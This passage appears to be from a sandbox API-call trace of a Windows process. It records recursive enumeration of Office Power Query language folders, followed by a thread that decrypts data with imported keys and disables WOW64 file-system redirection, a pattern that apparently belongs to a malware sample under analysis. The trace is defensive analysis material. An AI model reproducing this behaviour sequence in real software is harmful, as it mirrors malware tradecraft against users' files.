cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.682] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf854e731, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf8574958, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8eaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.682] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf854e731, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf8574958, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8eaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0047.682] FindClose (in: hFindFile=0xf71e80 | out: hFindFile=0xf71e80) returned 1 [0047.683] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.683] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0047.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-BR\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf720c0 [0047.962] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.962] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc0e95c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.962] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9ea37c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9ea37c1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.962] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7582db3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7582db3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.962] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bfa6d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.962] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bfa6d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0047.962] FindClose (in: hFindFile=0xf720c0 | out: hFindFile=0xf720c0) returned 1 [0047.963] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.963] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0047.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-pt\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71a40 [0047.965] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.965] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc70564d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc70564d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc72b8a6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.965] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e82eb0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.965] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4ba375b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4ba375b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.965] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63c7502, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63c7502, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf63c7502, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8c040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.965] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63c7502, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63c7502, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf63c7502, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8c040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0047.965] FindClose (in: hFindFile=0xf71a40 | out: hFindFile=0xf71a40) returned 1 [0047.966] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.966] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0047.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ro\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71b80 [0047.967] FindNextFileW (in: hFindFile=0xf71b80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.967] FindNextFileW (in: hFindFile=0xf71b80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80fc2c4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80fc2c4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80fc2c4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.967] FindNextFileW (in: hFindFile=0xf71b80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5fc257f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5fc257f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x605aed7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.967] FindNextFileW (in: hFindFile=0xf71b80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.967] FindNextFileW (in: hFindFile=0xf71b80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0063153, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8daa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.967] FindNextFileW (in: hFindFile=0xf71b80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0063153, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8daa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0047.968] FindClose (in: hFindFile=0xf71b80 | out: hFindFile=0xf71b80) returned 1 [0047.968] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.968] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0047.968] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ru\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71b00 [0047.969] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.969] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbdc8437, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbdc8437, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdc8437, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.969] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1329a43, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1329a43, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1329a43, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.969] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf71003, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xfbd422, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3daa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.969] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63a12a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63a12a0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf63a12a0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb2040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.969] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63a12a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63a12a0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf63a12a0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb2040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0047.970] FindClose (in: hFindFile=0xf71b00 | out: hFindFile=0xf71b00) returned 1 [0047.970] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.970] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0047.970] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sk\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71d00 [0047.972] FindNextFileW (in: hFindFile=0xf71d00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.972] FindNextFileW (in: hFindFile=0xf71d00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd09866, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd09866, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0052.606] SetLastError (dwErrCode=0x12) Thread: id = 31 os_tid = 0xc58 [0045.101] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3350298 [0045.101] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x33602a0 [0045.102] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x28) returned 0x2a6a3f0 [0045.102] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x110102) returned 0x38fc020 [0045.104] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a6a420 [0045.104] CryptImportKey (in: hProv=0xf466e8, pbData=0x352faa8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x352fb10 | out: phKey=0x352fb10*=0xf590a8) returned 1 [0045.104] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x352faf8, dwFlags=0x0) returned 1 [0045.104] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a420, pdwDataLen=0x352fac4 | out: pbData=0x2a6a420, pdwDataLen=0x352fac4) returned 1 [0045.104] CryptDestroyKey (hKey=0xf590a8) returned 1 [0045.105] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.105] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.105] Wow64DisableWow64FsRedirection (in: OldValue=0x352fb60 | out: OldValue=0x352fb60*=0x0) returned 1 [0045.105] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a420 | out: hHeap=0x2a60000) returned 1 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.105] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.106] WaitForSingleObject (hHandle=0x2d0, 